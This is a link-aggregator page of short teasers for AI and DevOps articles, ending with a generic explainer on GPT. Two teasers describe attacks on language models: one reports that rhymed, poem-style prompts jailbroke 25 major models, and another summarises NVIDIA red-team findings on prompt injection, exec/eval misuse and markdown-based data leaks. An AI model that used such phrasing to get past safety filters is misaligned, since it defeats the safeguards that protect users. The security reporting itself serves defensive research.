Join us

ContentUpdates and recent posts about GPT..
Link
@kala shared a link, 1 month, 2 weeks ago
FAUN.dev()

Learning Collatz - The Mother of all Rabbit Holes

Researchers trained small transformer models to predict the "long Collatz step," an arithmetic rule for the infamous unsolved Collatz conjecture, achieving surprisingly high accuracy up to 99.8%. The models did not learn the universal algorithm, but instead showed quantized learning, mastering speci.. read more  

Link
@kala shared a link, 1 month, 2 weeks ago
FAUN.dev()

200k Tokens Is Plenty

Amp’s team isn’t chasing token limits. Even with ~200k available via Opus 4.5, they stick toshort, modular threads, around 80k tokens each. Why? Smaller threads are cheaper, more stable, and just work better. Instead of stuffing everything into a single mega-context, they slice big tasks into focuse.. read more  

200k Tokens Is Plenty
Link
@kala shared a link, 1 month, 2 weeks ago
FAUN.dev()

Google tests new Gemini 3 models on LM Arena

Google’s been quietly field-testing two shadow models,Fierce FalconandGhost Falcon, on LM Arena. Early signs? They're probably warm-ups for the next Gemini 3 Flash or Pro drop. Classic Google move: float a checkpoint, stir up curiosity, then go GA... read more  

Google tests new Gemini 3 models on LM Arena
Link
@kala shared a link, 1 month, 2 weeks ago
FAUN.dev()

Practical LLM Security Advice from the NVIDIA AI Red Team

NVIDIA’s AI Red Team nailed three security sinkholes in LLMs:reckless use ofexec/eval,RAG pipelines that grab too much data, andmarkdown that doesn't get cleaned. These cracks open doors to remote code execution, sneaky prompt injection, and link-based data leaks. The fix-it trend:App security’s lea.. read more  

Link
@kala shared a link, 1 month, 2 weeks ago
FAUN.dev()

A trillion dollars is a terrible thing to waste

OpenAI co-founder Ilya Sutskever just said the quiet part out loud: scaling laws are breaking down. Bigger models aren’t getting better at thinking, they’re getting worse at generalizing and reasoning. Now he’s eyeingneurosymbolic AIandinnate inductive constraints. Yep, the “just make it huge” era m.. read more  

A trillion dollars is a terrible thing to waste
Link
@kala shared a link, 1 month, 2 weeks ago
FAUN.dev()

Roses are red, violets are blue, if you phrase it as poem, any jailbreak will do

A new study just broke the safety game wide open: rhymed prompts slipped past filters in25 major LLMs, including Gemini 2.5 Pro and Deepseek - withup to 100% success. No clever chaining, no jailbreak soup. Just single-shot rhyme. Turns out, poetic language isn’t just for bard-core Twitter. When it c.. read more  

Roses are red, violets are blue, if you phrase it as poem, any jailbreak will do
Link
@kala shared a link, 1 month, 2 weeks ago
FAUN.dev()

Prompts for Open Problems

The author, Ben Recht, proposes five research directions inspired by his graduate machine learning class, arguing for different research rather than just more. These prompts include adopting a design-based view for decision theory, explaining the robust scaling trends in competitive testing, and mov.. read more  

Link
@devopslinks shared a link, 1 month, 2 weeks ago
FAUN.dev()

Why we're leaving serverless

Every millisecond matters in the critical path of API authentication. After two years of battling serverless limitations, the entire API stack was rebuilt to reduce end-to-end latency. The move from Cloudflare Workers to stateful Go servers resulted in a 6x performance improvement and simplified arc.. read more  

Why we're leaving serverless
Link
@devopslinks shared a link, 1 month, 2 weeks ago
FAUN.dev()

Advancing Our Chef Infrastructure: Safety Without Disruption

Slack pulled back the curtain onSlack AI, its LLM-powered assistant built with a fortress mindset. Every customer gets their ownisolated environment. Any data passed tovendor LLMs? It'sephemeral. Gone before it can stick. No fine-tuning. No exporting data outside Slack. And there’s a wholemiddle-lay.. read more  

Link
@devopslinks shared a link, 1 month, 2 weeks ago
FAUN.dev()

You’ll never see attrition referenced in an RCA

Lorin Hochstein argues that while high-profile engineer attrition is often speculated to contribute to major outages, it is universally absent from public Root Cause Analyses (RCAs). This exclusion occurs because public RCAs aim to reassure customers by focusing on technical fixes, whereas attrition.. read more  

GPT (Generative Pre-trained Transformer) is a deep learning model developed by OpenAI that has been pre-trained on massive amounts of text data using unsupervised learning techniques. GPT is designed to generate human-like text in response to prompts, and it is capable of performing a variety of natural language processing tasks, including language translation, summarization, and question-answering. The model is based on the transformer architecture, which allows it to handle long-range dependencies and generate coherent, fluent text. GPT has been used in a wide range of applications, including chatbots, language translation, and content generation.

GPT is a family of language models that have been trained on large amounts of text data using a technique called unsupervised learning. The model is pre-trained on a diverse range of text sources, including books, articles, and web pages, which allows it to capture a broad range of language patterns and styles. Once trained, GPT can be fine-tuned on specific tasks, such as language translation or question-answering, by providing it with task-specific data.

One of the key features of GPT is its ability to generate coherent and fluent text that is indistinguishable from human-generated text. This is achieved by training the model to predict the next word in a sentence given the previous words. GPT also uses a technique called attention, which allows it to focus on relevant parts of the input text when generating a response.

GPT has become increasingly popular in recent years, particularly in the field of natural language processing. The model has been used in a wide range of applications, including chatbots, content generation, and language translation. GPT has also been used to create AI-generated stories, poetry, and even music.